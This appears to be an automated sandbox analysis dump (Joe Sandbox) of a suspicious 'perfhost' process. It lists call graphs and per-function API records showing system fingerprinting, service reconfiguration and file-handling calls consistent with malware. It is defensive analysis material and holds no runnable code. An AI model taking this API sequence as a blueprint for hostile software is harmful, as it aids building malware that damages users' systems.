26 API calls 7310->7313 7311->7296 7312->7311 7314 7a302e 7312->7314 7315 7a3025 7312->7315 7313->7311 7314->7311 7318 7a15d3 __dosmaperr 20 API calls 7314->7318 7316 7a15d3 __dosmaperr 20 API calls 7315->7316 7317 7a302a 7316->7317 7319 7a1517 _abort 26 API calls 7317->7319 7318->7317 7319->7311 7320->7305 7605 765b56 7606 765b1d 7605->7606 7607 765a9f 7605->7607 7606->7607 7608 765d20 2 API calls 7606->7608 7607->7607 7609 765b3c 7608->7609 7746 764f92 7747 765d20 2 API calls 7746->7747 7748 764f99 7747->7748 7339 764b70 GetUserDefaultUILanguage 7340 764b82 7339->7340 7610 761130 GetPEB 7611 787df0 7613 787d20 7611->7613 7612 787e06 
GetComputerNameW 7617 787d37 7612->7617 7613->7611 7613->7612 7614 787d6c GetVolumeInformationW 7613->7614 7615 787d30 7613->7615 7616 787d83 GetWindowsDirectoryW 7613->7616 7613->7617 7615->7614 7615->7617 7616->7615 7616->7617 7678 78cbd0 7693 78be50 _wcslen 7678->7693 7679 78c168 7701 78a9a0 7679->7701 7681 765d20 2 API calls 7681->7693 7682 78c78e CloseServiceHandle 7682->7693 7683 78bffd StrStrIW 7683->7693 7684 78c706 StrStrIW 7684->7693 7686 78bf68 StrStrIW 7686->7693 7687 78c72b StrStrIW 7687->7693 7688 78c399 StrStrIW 7692 78c3a9 7688->7692 7688->7693 7690 78c0fd CloseServiceHandle 7690->7693 7691 78c7e4 StartServiceW 7691->7693 7693->7678 7693->7679 7693->7681 7693->7682 7693->7683 7693->7684 7693->7686 7693->7687 7693->7688 7693->7690 7693->7691 7694 78c36b OpenServiceW 7693->7694 7695 78c65a ChangeServiceConfigW 7693->7695 7696 78bfe9 7693->7696 7697 78a350 7693->7697 7705 76ce90 7693->7705 7694->7693 7695->7693 7695->7696 7698 78a356 7697->7698 7699 78a707 CloseServiceHandle 7698->7699 7700 78a389 7698->7700 7699->7700 7700->7693 7702 78a905 7701->7702 7704 78a907 7701->7704 7702->7696 7702->7701 7703 78a92e LocalFree 7702->7703 7702->7704 7703->7702 7704->7696 7714 76cc9b _wcslen 7705->7714 7706 76d5c5 CreateFileW 7706->7714 7707 76d729 GetFileSizeEx 7709 76d8a1 CloseHandle 7707->7709 7707->7714 7708 765d20 VirtualAlloc VirtualFree 7708->7714 7709->7714 7710 76d42a CloseHandle 7710->7714 7711 76cd5c lstrcmpiW 7711->7714 7713 76cca0 lstrcmpiW 7713->7714 7714->7693 7714->7705 7714->7706 7714->7707 7714->7708 7714->7709 7714->7710 7714->7711 7714->7713 7716 76d049 SetFilePointerEx 7714->7716 7717 76d378 CloseHandle 7714->7717 7719 76cfbb GetFileTime 7714->7719 7720 76cc92 7714->7720 7721 76d903 7714->7721 7722 7689a0 7714->7722 7727 768470 7714->7727 7716->7714 7717->7714 7718 79fdfc 40 API calls 7718->7721 7719->7714 7720->7693 7721->7718 7721->7720 7724 7689a4 7722->7724 7723 765d20 2 API calls 7723->7724 7724->7722 7724->7723 7726 768937 7724->7726 
7735 7684c0 7724->7735 7726->7714 7728 765d20 2 API calls 7727->7728 7732 768481 7728->7732 7729 768487 7730 7684c0 2 API calls 7729->7730 7734 768497 7730->7734 7731 771d60 2 API calls 7731->7732 7732->7727 7732->7729 7732->7731 7733 765d20 VirtualAlloc VirtualFree 7732->7733 7732->7734 7733->7732 7734->7714 7741 768470 7735->7741 7736 768487 7737 7684c0 2 API calls 7736->7737 7740 768497 7737->7740 7739 765d20 VirtualAlloc VirtualFree 7739->7741 7740->7724 7741->7735 7741->7736 7741->7739 7741->7740 7742 771d60 7741->7742 7744 771d62 7742->7744 7745 771d76 7742->7745 7743 765d20 2 API calls 7743->7744 7744->7741 7744->7743 7744->7745 7745->7741 7151 7a0070 7152 7a007c 7151->7152 7155 79ffe2 7152->7155 7156 79fff9 7155->7156 7157 7a15d3 __dosmaperr 20 API calls 7156->7157 7160 7a0047 7156->7160 7158 7a003d 7157->7158 7159 7a1517 _abort 26 API calls 7158->7159 7159->7160 7341 7a7977 7342 7a7999 7341->7342 7343 7a7984 7341->7343 7348 7a7994 7342->7348 7357 7a7671 7342->7357 7344 7a15d3 __dosmaperr 20 API calls 7343->7344 7346 7a7989 7344->7346 7347 7a1517 _abort 26 API calls 7346->7347 7347->7348 7353 7a79bb 7374 7a8664 7353->7374 7356 7a2096 _free 20 API calls 7356->7348 7358 7a7689 7357->7358 7362 7a7685 7357->7362 7359 7a7951 26 API calls 7358->7359 7358->7362 7360 7a76a9 7359->7360 7389 7a812c 7360->7389 7363 7a77ff 7362->7363 7364 7a7815 7363->7364 7366 7a7826 7363->7366 7365 7a2096 _free 20 API calls 7364->7365 7364->7366 7365->7366 7367 7a7951 7366->7367 7368 7a795d 7367->7368 7369 7a7972 7367->7369 7370 7a15d3 __dosmaperr 20 API calls 7368->7370 7369->7353 7371 7a7962 7370->7371 7372 7a1517 _abort 26 API calls 7371->7372 7373 7a796d 7372->7373 7373->7353 7375 7a8673 7374->7375 7377 7a8688 7374->7377 7376 7a15c0 __dosmaperr 20 API calls 7375->7376 7379 7a8678 7376->7379 7378 7a86c3 7377->7378 7382 7a86af 7377->7382 7380 7a15c0 __dosmaperr 20 API calls 7378->7380 7381 7a15d3 __dosmaperr 20 API calls 7379->7381 7383 7a86c8 7380->7383 7386 7a79c1 7381->7386 7562 
7a863c 7382->7562 7385 7a15d3 __dosmaperr 20 API calls 7383->7385 7387 7a86d0 7385->7387 7386->7348 7386->7356 7388 7a1517 _abort 26 API calls 7387->7388 7388->7386 7390 7a8138 _abort 7389->7390 7391 7a8158 7390->7391 7392 7a8140 7390->7392 7394 7a81f6 7391->7394 7398 7a818d 7391->7398 7414 7a15c0 7392->7414 7396 7a15c0 __dosmaperr 20 API calls 7394->7396 7399 7a81fb 7396->7399 7397 7a15d3 __dosmaperr 20 API calls 7400 7a814d _abort 7397->7400 7417 7a8423 RtlEnterCriticalSection 7398->7417 7402 7a15d3 __dosmaperr 20 API calls 7399->7402 7400->7362 7404 7a8203 7402->7404 7403 7a8193 7405 7a81af 7403->7405 7406 7a81c4 7403->7406 7407 7a1517 _abort 26 API calls 7404->7407 7409 7a15d3 __dosmaperr 20 API calls 7405->7409 7418 7a8217 7406->7418 7407->7400 7410 7a81b4 7409->7410 7411 7a15c0 __dosmaperr 20 API calls 7410->7411 7412 7a81bf 7411->7412 7469 7a81ee 7412->7469 7415 7a18df __dosmaperr 20 API calls 7414->7415 7416 7a15c5 7415->7416 7416->7397 7417->7403 7419 7a8245 7418->7419 7456 7a823e 7418->7456 7420 7a8268 7419->7420 7421 7a8249 7419->7421 7425 7a82b9 7420->7425 7426 7a829c 7420->7426 7422 7a15c0 __dosmaperr 20 API calls 7421->7422 7424 7a824e 7422->7424 7423 7a4c0d __startOneArgErrorHandling 5 API calls 7427 7a841f 7423->7427 7428 7a15d3 __dosmaperr 20 API calls 7424->7428 7429 7a82cf 7425->7429 7472 7a8838 7425->7472 7430 7a15c0 __dosmaperr 20 API calls 7426->7430 7427->7412 7431 7a8255 7428->7431 7475 7a7dbc 7429->7475 7434 7a82a1 7430->7434 7436 7a1517 _abort 26 API calls 7431->7436 7435 7a15d3 __dosmaperr 20 API calls 7434->7435 7438 7a82a9 7435->7438 7436->7456 7441 7a1517 _abort 26 API calls 7438->7441 7439 7a82dd 7444 7a8303 7439->7444 7445 7a82e1 7439->7445 7440 7a8316 7442 7a832a 7440->7442 7443 7a8370 WriteFile 7440->7443 7441->7456 7448 7a8332 7442->7448 7449 7a8360 7442->7449 7446 7a8393 GetLastError 7443->7446 7452 7a82f9 7443->7452 7487 7a7b9c GetConsoleCP 7444->7487 7450 7a83d7 7445->7450 7482 7a7d4f 7445->7482 7446->7452 7453 7a8350 
7448->7453 7454 7a8337 7448->7454 7513 7a7e32 7449->7513 7450->7456 7457 7a15d3 __dosmaperr 20 API calls 7450->7457 7452->7450 7452->7456 7460 7a83b3 7452->7460 7505 7a7fff 7453->7505 7454->7450 7498 7a7f11 7454->7498 7456->7423 7459 7a83fc 7457->7459 7462 7a15c0 __dosmaperr 20 API calls 7459->7462 7463 7a83ba 7460->7463 7464 7a83ce 7460->7464 7462->7456 7465 7a15d3 __dosmaperr 20 API calls 7463->7465 7520 7a159d 7464->7520 7467 7a83bf 7465->7467 7468 7a15c0 __dosmaperr 20 API calls 7467->7468 7468->7456 7561 7a8446 RtlLeaveCriticalSection 7469->7561 7471 7a81f4 7471->7400 7525 7a87ba 7472->7525 7547 7a8564 7475->7547 7477 7a7dd1 7477->7439 7477->7440 7478 7a7dcc 7478->7477 7479 7a185b _abort 38 API calls 7478->7479 7480 7a7df4 7479->7480 7480->7477 7481 7a7e12 GetConsoleMode 7480->7481 7481->7477 7485 7a7da9 7482->7485 7486 7a7d74 7482->7486 7483 7a7dab GetLastError 7483->7485 7484 7a8853 WriteConsoleW CreateFileW 7484->7486 7485->7452 7486->7483 7486->7484 7486->7485 7489 7a7bff 7487->7489 7497 7a7d11 7487->7497 7488 7a4c0d __startOneArgErrorHandling 5 API calls 7490 7a7d4b 7488->7490 7492 7a7c85 WideCharToMultiByte 7489->7492 7494 7a7937 40 API calls __fassign 7489->7494 7496 7a7cdc WriteFile 7489->7496 7489->7497 7556 7a304d 7489->7556 7490->7452 7493 7a7cab WriteFile 7492->7493 7492->7497 7493->7489 7495 7a7d34 GetLastError 7493->7495 7494->7489 7495->7497 7496->7489 7496->7495 7497->7488 7503 7a7f20 7498->7503 7499 7a7fe2 7500 7a4c0d __startOneArgErrorHandling 5 API calls 7499->7500 7504 7a7ffb 7500->7504 7501 7a7f9e WriteFile 7502 7a7fe4 GetLastError 7501->7502 7501->7503 7502->7499 7503->7499 7503->7501 7504->7452 7508 7a800e 7505->7508 7506 7a8119 7507 7a4c0d __startOneArgErrorHandling 5 API calls 7506->7507 7509 7a8128 7507->7509 7508->7506 7510 7a8090 WideCharToMultiByte 7508->7510 7512 7a80c5 WriteFile 7508->7512 7509->7452 7511 7a8111 GetLastError 7510->7511 7510->7512 7511->7506 7512->7508 7512->7511 7518 7a7e41 7513->7518 7514 7a7ef4 7515 7a4c0d 
__startOneArgErrorHandling 5 API calls 7514->7515 7519 7a7f0d 7515->7519 7516 7a7eb3 WriteFile 7517 7a7ef6 GetLastError 7516->7517 7516->7518 7517->7514 7518->7514 7518->7516 7519->7452 7521 7a15c0 __dosmaperr 20 API calls 7520->7521 7522 7a15a8 __dosmaperr 7521->7522 7523 7a15d3 __dosmaperr 20 API calls 7522->7523 7524 7a15bb 7523->7524 7524->7456 7534 7a84fa 7525->7534 7527 7a87cc 7528 7a87d4 7527->7528 7529 7a87e5 SetFilePointerEx 7527->7529 7530 7a15d3 __dosmaperr 20 API calls 7528->7530 7531 7a87d9 7529->7531 7532 7a87fd GetLastError 7529->7532 7530->7531 7531->7429 7533 7a159d __dosmaperr 20 API calls 7532->7533 7533->7531 7535 7a8507 7534->7535 7537 7a851c 7534->7537 7536 7a15c0 __dosmaperr 20 API calls 7535->7536 7538 7a850c 7536->7538 7539 7a15c0 __dosmaperr 20 API calls 7537->7539 7542 7a8541 7537->7542 7541 7a15d3 __dosmaperr 20 API calls 7538->7541 7540 7a854c 7539->7540 7543 7a15d3 __dosmaperr 20 API calls 7540->7543 7544 7a8514 7541->7544 7542->7527 7545 7a8554 7543->7545 7544->7527 7546 7a1517 _abort 26 API calls 7545->7546 7546->7544 7548 7a857e 7547->7548 7549 7a8571 7547->7549 7551 7a15d3 __dosmaperr 20 API calls 7548->7551 7552 7a858a 7548->7552 7550 7a15d3 __dosmaperr 20 API calls 7549->7550 7554 7a8576 7550->7554 7553 7a85ab 7551->7553 7552->7478 7555 7a1517 _abort 26 API calls 7553->7555 7554->7478 7555->7554 7557 7a185b _abort 38 API calls 7556->7557 7558 7a3058 7557->7558 7559 7a1964 __fassign 38 API calls 7558->7559 7560 7a3068 7559->7560 7560->7489 7561->7471 7565 7a85ba 7562->7565 7564 7a8660 7564->7386 7566 7a85c6 _abort 7565->7566 7576 7a8423 RtlEnterCriticalSection 7566->7576 7568 7a85d4 7569 7a85fb 7568->7569 7570 7a8606 7568->7570 7577 7a86e3 7569->7577 7572 7a15d3 __dosmaperr 20 API calls 7570->7572 7573 7a8601 7572->7573 7592 7a8630 7573->7592 7575 7a8623 _abort 7575->7564 7576->7568 7578 7a84fa 26 API calls 7577->7578 7580 7a86f3 7578->7580 7579 7a86f9 7595 7a8469 7579->7595 7580->7579 7582 7a84fa 26 API calls 7580->7582 7591 
7a872b 7580->7591 7584 7a8722 7582->7584 7583 7a84fa 26 API calls 7585 7a8737 CloseHandle 7583->7585 7588 7a84fa 26 API calls 7584->7588 7585->7579 7589 7a8743 GetLastError 7585->7589 7586 7a8773 7586->7573 7588->7591 7589->7579 7590 7a159d __dosmaperr 20 API calls 7590->7586 7591->7579 7591->7583 7604 7a8446 RtlLeaveCriticalSection 7592->7604 7594 7a863a 7594->7575 7596 7a8478 7595->7596 7597 7a84df 7595->7597 7596->7597 7602 7a84a2 7596->7602 7598 7a15d3 __dosmaperr 20 API calls 7597->7598 7599 7a84e4 7598->7599 7600 7a15c0 __dosmaperr 20 API calls 7599->7600 7601 7a84cf 7600->7601 7601->7586 7601->7590 7602->7601 7603 7a84c9 SetStdHandle 7602->7603 7603->7601 7604->7594 7618 7a0ff7 7619 7a1000 7618->7619 7622 7a1c33 7619->7622 7623 7a1c72 __startOneArgErrorHandling 7622->7623 7628 7a1cf4 __startOneArgErrorHandling 7623->7628 7632 7a3980 7623->7632 7625 7a1d1e 7627 7a1d2a 7625->7627 7639 7a3c94 7625->7639 7630 7a4c0d __startOneArgErrorHandling 5 API calls 7627->7630 7628->7625 7635 7a3655 7628->7635 7631 7a1020 7630->7631 7646 7a39a3 7632->7646 7636 7a367d 7635->7636 7637 7a4c0d __startOneArgErrorHandling 5 API calls 7636->7637 7638 7a369a 7637->7638 7638->7625 7640 7a3ca1 7639->7640 7641 7a3cb6 7639->7641 7642 7a3cbb 7640->7642 7644 7a15d3 __dosmaperr 20 API calls 7640->7644 7643 7a15d3 __dosmaperr 20 API calls 7641->7643 7642->7627 7643->7642 7645 7a3cae 7644->7645 7645->7627 7647 7a39ce __raise_exc 7646->7647 7648 7a3bc7 RaiseException 7647->7648 7649 7a399e 7648->7649 7649->7628 7322 7a22b5 7323 7a20ef __dosmaperr 5 API calls 7322->7323 7324 7a22dc 7323->7324 7325 7a22fa InitializeCriticalSectionAndSpinCount 7324->7325 7326 7a22e5 7324->7326 7325->7326 7327 7a4c0d __startOneArgErrorHandling 5 API calls 7326->7327 7328 7a2311 7327->7328 6629 765085 6630 76506f 6629->6630 6631 765089 6629->6631 6634 788550 6630->6634 6633 765078 6640 788556 6634->6640 6635 788145 GetLastError 6649 787dd7 6635->6649 6636 788209 GetUserNameW 6636->6649 6656 787d37 6636->6656 6637 
788bc1 GetLastError 6637->6640 6638 788986 SetEntriesInAclW 6638->6640 6639 7883fb GetUserNameW 6639->6649 6640->6634 6640->6635 6640->6637 6640->6638 6642 7889cd OpenMutexW 6640->6642 6648 788599 6640->6648 6640->6649 6650 787d20 6640->6650 6653 787d30 6640->6653 6654 78896a wsprintfW 6640->6654 6655 788953 AllocateAndInitializeSid 6640->6655 6640->6656 6658 78890b LocalFree 6640->6658 6641 788248 6643 78824a GetLastError 6641->6643 6642->6633 6646 788250 6643->6646 6645 787d6c GetVolumeInformationW 6645->6633 6646->6633 6647 78836e GetLastError 6647->6649 6648->6653 6648->6654 6649->6635 6649->6636 6649->6639 6649->6641 6649->6643 6649->6645 6649->6647 6649->6650 6651 787fd4 GetLastError 6649->6651 6649->6653 6649->6656 6659 787f6b GetVolumeInformationW 6649->6659 6650->6645 6652 787d83 GetWindowsDirectoryW 6650->6652 6650->6653 6650->6656 6657 787e06 GetComputerNameW 6650->6657 6651->6649 6652->6653 6652->6656 6653->6645 6653->6656 6654->6653 6655->6640 6656->6633 6657->6656 6658->6640 6659->6649 7338 7a708e RtlUnwind 6660 765d20 6662 765d22 6660->6662 6661 765d39 VirtualAlloc 6661->6662 6662->6661 6664 765d46 VirtualFree 6662->6664 7329 7658ac 7330 7658b6 7329->7330 7332 7658be 7330->7332 7333 765d20 7330->7333 7335 765d22 7333->7335 7334 765d39 VirtualAlloc 7334->7335 7335->7332 7335->7334 7337 765d46 VirtualFree 7335->7337 7337->7332 7650 7a8de0 7651 7a8df9 __startOneArgErrorHandling 7650->7651 7653 7a8e22 __startOneArgErrorHandling 7651->7653 7654 7a36d2 7651->7654 7655 7a370b __startOneArgErrorHandling 7654->7655 7656 7a39a3 __raise_exc RaiseException 7655->7656 7657 7a3732 __startOneArgErrorHandling 7655->7657 7656->7657 7658 7a3775 7657->7658 7659 7a3750 7657->7659 7660 7a3c94 __startOneArgErrorHandling 20 API calls 7658->7660 7665 7a3cc3 7659->7665 7662 7a3770 __startOneArgErrorHandling 7660->7662 7663 7a4c0d __startOneArgErrorHandling 5 API calls 7662->7663 7664 7a3799 7663->7664 7664->7653 7666 7a3cd2 7665->7666 7667 7a3cf1 __startOneArgErrorHandling 
7666->7667 7668 7a3d46 __startOneArgErrorHandling 7666->7668 7670 7a3655 __startOneArgErrorHandling 5 API calls 7667->7670 7669 7a3c94 __startOneArgErrorHandling 20 API calls 7668->7669 7673 7a3d3f 7669->7673 7671 7a3d32 7670->7671 7672 7a3c94 __startOneArgErrorHandling 20 API calls 7671->7672 7671->7673 7672->7673 7673->7662 7674 7a0fe0 7675 7a1000 7674->7675 7676 7a1c33 __startOneArgErrorHandling 21 API calls 7675->7676 7677 7a1020 7676->7677 7161 765648 7164 768250 GetCurrentProcess 7161->7164 7163 76564f 7164->7163
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2952576778.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_760000_perfhost.jbxd
                                        Similarity
                                        • API ID: ErrorLast
                                        • String ID:
                                        • API String ID: 1452528299-0
                                        • Opcode ID: 8f23611293171af965204233360cd2461fdc816d478a7012b577320d11231a79
                                        • Instruction ID: e2ddd2c0a7f2a80c93fce8235177780d26751921140c88731f72032bc52ecb94
                                        • Opcode Fuzzy Hash: 8f23611293171af965204233360cd2461fdc816d478a7012b577320d11231a79
                                        • Instruction Fuzzy Hash: 70E12A61ACC341AACBFA77284C0D7352B616B62730FEC4689E156D61E2EE6C9C05D337

                                        Control-flow Graph
                                        control_flow_graph 339 787df0-787dfa 340 788288-78829a call 770d80 339->340 341 787e00 339->341 348 78851e-78852d call 770d80 340->348 349 7882a0 340->349 341->340 342 787e06-787e15 GetComputerNameW 341->342 344 787e1b 342->344 345 7882b6-7882bb 342->345 344->345 347 787e21-787e2d 344->347 349->348 351 7882a6 349->351 354 787dbc-787dce 351->354 355 7882ac 351->355 361 787d6c-787d80 GetVolumeInformationW 354->361 362 787d35 354->362 357 787d20-787d2b 355->357 358 7882b2-7882b4 355->358 359 787d2d-787d94 357->359 360 787d61-787d68 357->360 358->345 359->360 367 787d96 359->367 365 787d6a 360->365 366 787de5-787dea 360->366 362->361 364 787d37-787d39 362->364 368 787d3b-787d46 364->368 365->361 365->366 369 787dec 366->369 370 787d83-787d8c GetWindowsDirectoryW 366->370 372 787d97-787d98 367->372 368->372 373 787d48-787dac 368->373 369->370 374 787dee 369->374 370->368 371 787d8e-787da6 370->371 371->354 379 787da8 371->379 376 787d9a-787d9f 372->376 377 787de2 372->377 373->372 380 787dae-787db3 373->380 374->339 379->354 381 787daa-787dba 379->381 381->354
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2952576778.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_760000_perfhost.jbxd
                                        Similarity
                                        • API ID: ComputerName
                                        • String ID:
                                        • API String ID: 3545744682-0
                                        • Opcode ID: 77b9d483e1136cae4e59aa627eee538cb5b15670b8fd1f87b51647b499be01a7
                                        • Instruction ID: 3d64e0040f1da20c81796767601268e243b1d6406b2aa11ff29f50002a13ad56
                                        • Opcode Fuzzy Hash: 77b9d483e1136cae4e59aa627eee538cb5b15670b8fd1f87b51647b499be01a7
                                        • Instruction Fuzzy Hash: 9421F4B57CC3407BD63D76148C0ABB53A642FA1B10FB88485E48B551D2E66CEC09C3B7

                                        Control-flow Graph
                                        control_flow_graph 383 765d20 384 765d26-765d2d 383->384 385 765d22 383->385 387 765d36-765d37 384->387 388 765d2f 384->388 385->384 386 765d24 385->386 386->384 390 765d5d 387->390 391 765d39-765d42 VirtualAlloc 387->391 388->387 389 765d30-765d31 388->389 392 765d33-765d35 389->392 394 765d64 390->394 395 765d5f 390->395 391->392 393 765d44 391->393 392->387 393->392 396 765d46-765d50 393->396 398 765d66 394->398 399 765d69-765d73 VirtualFree 394->399 395->394 397 765d61 395->397 400 765d54-765d5b 396->400 401 765d52 396->401 397->394 402 765d63 397->402 398->399 403 765d68 398->403 400->390 400->394 401->400 402->394 403->399
                                        APIs
                                        • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00765D6D
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2952576778.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_760000_perfhost.jbxd
                                        Similarity
                                        • API ID: FreeVirtual
                                        • String ID:
                                        • API String ID: 1263568516-0
                                        • Opcode ID: 626e1bf037e72fe79c5e1ec633df1b7fee2211e443035f99874613aaeb27b446
                                        • Instruction ID: 640acb43539dd74268d849af1cf2ffaa62d2a3b224fcc9296926887465bd92d5
                                        • Opcode Fuzzy Hash: 626e1bf037e72fe79c5e1ec633df1b7fee2211e443035f99874613aaeb27b446
                                        • Instruction Fuzzy Hash: 8AF0E951B04F40BACE3E1364EDDDB752A209B53738F0C4345AEA3290F2875D1C06FA02
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2952576778.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_760000_perfhost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: d$w
                                        • API String ID: 0-2400632791
                                        • Opcode ID: 6fcf8d884e933b3770720bd2658b6604f1e9a6d11bec288e7bd7461bcad32a79
                                        • Instruction ID: 621f0861d4e4261e0260c6eedd42a90ef0793cf626747d41d231bc69da7300f6
                                        • Opcode Fuzzy Hash: 6fcf8d884e933b3770720bd2658b6604f1e9a6d11bec288e7bd7461bcad32a79
                                        • Instruction Fuzzy Hash: 04C124A1AC8384AEDE337A248C4DB763B64AB61760F5C4196F649D60F3E37C5C049732
                                        APIs
                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 007A1459
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 007A1463
                                        • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,00000000), ref: 007A1470
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2952576778.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_760000_perfhost.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                        • String ID:
                                        • API String ID: 3906539128-0
                                        • Opcode ID: 1e7c939db45c659f12cf128101255cccf3ae16b2cb0daa408e65b844786aed8b
                                        • Instruction ID: e637d6a1043264dc612aa71ff9f30d96a4cb5581d62438a0d496efd7a84ca8fa
                                        • Opcode Fuzzy Hash: 1e7c939db45c659f12cf128101255cccf3ae16b2cb0daa408e65b844786aed8b
                                        • Instruction Fuzzy Hash: BA31D67490122CEBCB21DF68D888B9DB7B8AF89310F5042DAE41CA7250E7749F858F55
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000003,?,007A3F13,00000003,007BDE80,0000000C,007A403D,00000003,00000002,00000000,?,007A2038,00000003), ref: 007A3F5E
                                        • TerminateProcess.KERNEL32(00000000,?,007A3F13,00000003,007BDE80,0000000C,007A403D,00000003,00000002,00000000,?,007A2038,00000003), ref: 007A3F65
                                        • ExitProcess.KERNEL32 ref: 007A3F77
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2952576778.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_760000_perfhost.jbxd
                                        Similarity
                                        • API ID: Process$CurrentExitTerminate
                                        • String ID:
                                        • API String ID: 1703294689-0
                                        • Opcode ID: 471e86185743e61ab6e5dc04d781bc969d7703552078f2dc5f650de095265f4c
                                        • Instruction ID: 755a9a8e1f371a328a975a46e8387f8448eca3157b9ea724e710170bbb6402f3
                                        • Opcode Fuzzy Hash: 471e86185743e61ab6e5dc04d781bc969d7703552078f2dc5f650de095265f4c
                                        • Instruction Fuzzy Hash: 47E04632414948FFCF016F28DC08A593B3AEBC6341F008514F8058A122DB3DDE42CB86
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2952576778.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_760000_perfhost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                        • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                        • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                        • Instruction Fuzzy Hash:

                                        Control-flow Graph (executed / not executed basic blocks) for the function at 7a24ff; graph node data omitted
                                        APIs
                                        • ___free_lconv_mon.LIBCMT ref: 007A2543
                                          • Part of subcall function 007A3073: _free.LIBCMT ref: 007A3090
                                          • Part of subcall function 007A3073: _free.LIBCMT ref: 007A30A2
                                          • Part of subcall function 007A3073: _free.LIBCMT ref: 007A30B4
                                          • Part of subcall function 007A3073: _free.LIBCMT ref: 007A30C6
                                          • Part of subcall function 007A3073: _free.LIBCMT ref: 007A30D8
                                          • Part of subcall function 007A3073: _free.LIBCMT ref: 007A30EA
                                          • Part of subcall function 007A3073: _free.LIBCMT ref: 007A30FC
                                          • Part of subcall function 007A3073: _free.LIBCMT ref: 007A310E
                                          • Part of subcall function 007A3073: _free.LIBCMT ref: 007A3120
                                          • Part of subcall function 007A3073: _free.LIBCMT ref: 007A3132
                                          • Part of subcall function 007A3073: _free.LIBCMT ref: 007A3144
                                          • Part of subcall function 007A3073: _free.LIBCMT ref: 007A3156
                                          • Part of subcall function 007A3073: _free.LIBCMT ref: 007A3168
                                        • _free.LIBCMT ref: 007A2538
                                          • Part of subcall function 007A2096: HeapFree.KERNEL32(00000000,00000000,?,007A3208,?,00000000,?,00000000,?,007A322F,?,00000007,?,?,007A2697,?), ref: 007A20AC
                                          • Part of subcall function 007A2096: GetLastError.KERNEL32(?,?,007A3208,?,00000000,?,00000000,?,007A322F,?,00000007,?,?,007A2697,?,?), ref: 007A20BE
                                        • _free.LIBCMT ref: 007A255A
                                        • _free.LIBCMT ref: 007A256F
                                        • _free.LIBCMT ref: 007A257A
                                        • _free.LIBCMT ref: 007A259C
                                        • _free.LIBCMT ref: 007A25AF
                                        • _free.LIBCMT ref: 007A25BD
                                        • _free.LIBCMT ref: 007A25C8
                                        • _free.LIBCMT ref: 007A2600
                                        • _free.LIBCMT ref: 007A2607
                                        • _free.LIBCMT ref: 007A2624
                                        • _free.LIBCMT ref: 007A263C
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2952576778.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_760000_perfhost.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                        • String ID:
                                        • API String ID: 161543041-0
                                        • Opcode ID: dd8c30027e788ff315326a360bc34489a4947c304b02b35e51587f5636727dad
                                        • Instruction ID: dafd9618f2d771c123102158a0e78d17cf2491fac3ed14588e1fc89b0e8e386b
                                        • Opcode Fuzzy Hash: dd8c30027e788ff315326a360bc34489a4947c304b02b35e51587f5636727dad
                                        • Instruction Fuzzy Hash: C4316A71A00301DFEB31AA3CD809B57B3E9BB82311F204669F46AD7152DE78ED92CB50

                                        Control-flow Graph (executed / not executed basic blocks) for the function at 7a7b9c; graph node data omitted
                                        APIs
                                        • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,007A8311,?,00000000,?,00000000,00000000), ref: 007A7BDE
                                        • __fassign.LIBCMT ref: 007A7C59
                                        • __fassign.LIBCMT ref: 007A7C74
                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 007A7C9A
                                        • WriteFile.KERNEL32(?,?,00000000,007A8311,00000000,?,?,?,?,?,?,?,?,?,007A8311,?), ref: 007A7CB9
                                        • WriteFile.KERNEL32(?,?,00000001,007A8311,00000000,?,?,?,?,?,?,?,?,?,007A8311,?), ref: 007A7CF2
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2952576778.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                        Joe Sandbox IDA Plugin
